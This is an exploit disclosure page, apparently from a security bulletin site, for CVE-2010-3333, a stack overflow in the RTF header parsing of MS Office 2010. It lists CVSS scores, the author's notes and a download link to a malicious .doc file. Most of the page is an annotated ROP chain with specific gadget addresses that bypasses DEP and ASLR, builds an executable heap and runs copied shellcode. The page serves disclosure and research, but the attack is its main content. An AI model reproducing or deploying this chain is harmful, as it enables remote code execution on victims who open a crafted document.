Bug: MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit ( Ascii Version )

Search:
WLB2

MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit

Published
Credit
Risk
2011.07.04
Snake
High
CWE
CVE
Local
Remote
CWE-119
CVE-2010-3333
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
9.3/10
10/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
Complete
Complete

# Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability
Exploit
# Date: 7/3/2011
# Author: Snake ( Shahriyar.j < at > gmail )
# Version: MS Office <= 2010
# Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7
# CVE : CVE-2010-3333

# This is the exploit I wrote for Abysssec "The Arashi" article.
# It gracefully bypass DEP/ASLR in MS Office 2010,
# and we named this method "Ikazuchi DEP/ASRL Bypass" : >
# unfortunately msgr3en.dll loads a few seconds after opining office,
# so just need to open open Office , and then open exploit after a few
second and saw a nice calc.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
http://www.exploit-db.com/download_pdf/17469

# me : twitter.com/ponez
# aslo check here for Persian docs of this methods and more :
http://www.0days.ir/article/

Exploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc


#
# and the Rop :

3F2CB9E0 POP ECX
RETN
# HeapCreate() IAT = 3F10115C

3F389CA5 MOV EAX,DWORD PTR DS:[ECX]
RETN
# EAX == HeapCreate() Address

3F39AFCF CALL EAX
RETN
# Call HeapCreate() and Create a Executable Heap :D
# after this call, EAX contain our Heap Address.

0x3F2CB9E0 POP ECX
RETN
# pop 0x00008000 into ECX

0x3F39CB46 ADD EAX,ECX
POP ESI
RETN
# add ECX to EAX and instead of calling HeapAlloc,
# now EAX point to the RWX Heap :D

0x3F2CB9E0 POP ECX
RETN
# pop 0x3F3B3DC0 into ECX, it is a writable address.

0x3F2233CC MOV DWORD PTR DS:[ECX],EAX
RETN
# storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for
further use ;)

0x3F2D59DF POP EAX
ADD DWORD PTR DS:[EAX],ESP
RETN
# pop 0x3F3B3DC4 into EAX , it is writable address with zero!
# then we add ESP to the Zero which result in storing ESP into
that address,
# we need ESP address for copying shellcode ( which stores in
Stack ),
# and we have to get it dynamically at run-time, now with my
tricky instruction, we have it!


0x3F2F18CC POP EAX
RETN
# pop 0x3F3B3DC4 ( ESP address ) into EAX


0x3F2B745E MOV ECX,DWORD PTR DS:[EAX]
RETN
# now ECX point to nearly offset of Stack.

0x3F39795E POP EDX
RETN
# pop 0x00000024 into EDX

0x3F39CB44 ADD ECX,EDX
ADD EAX,ECX
POP ESI
RETN
# add 0x24 to ECX ( Stack address )

0x3F398267 MOV EAX,ECX
RETN
# EAX = ECX ; )

0x3F3A16DE MOV DWORD PTR DS:[ECX],EAX
XOR EAX,EAX
POP ESI
RETN
# mov EAX ( Stack Address + 24 = Current ESP value ) into the
current Stack Location,
# and the popping it into ESI ! now ESI point where shellcode
stores in stack :D

0x3F398267 MOV EAX,ECX
RETN
# EAX = ECX ; )

3F2CB9E0 POP ECX
RETN
# pop 0x3F3B3DC0 ( Saved Heap address ) into ECX

0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]
RETN
# now EAX point to our RWX Heap

0x3F2B0A7C XCHG EAX,EDI
RETN 4
# EDI = Our RWX Heap Address


3F2CB9E0 POP ECX
RETN
# pop 0x3F3B3DC0 ( Saved Heap address ) into ECX


0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]
RETN
# now EAX point to our RWX Heap

0x3F38BEFB ADD AL,58
RETN
# just skip some junks ; )

3F2CB9E0 POP ECX
RETN
# pop 0x00000080 into ECX ( 0x80 * 4 = 0x200 = Copy lent )

3F3441B4 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
POP EDI
POP ESI
RETN
# Copy shellcode from stack into RWX Heap


3F39AFCF CALL EAX
RETN
# KABOOM !!!

Exploit: http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc

References:

http://www.us-cert.gov/cas/techalerts/TA10-313A.html
http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx
http://www.vupen.com/english/advisories/2010/2923
http://www.securitytracker.com/id?1024705
http://www.securityfocus.com/bid/44652
http://secunia.com/advisories/42144
http://2000secunia.com/advisories/38521
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880
http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11931

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version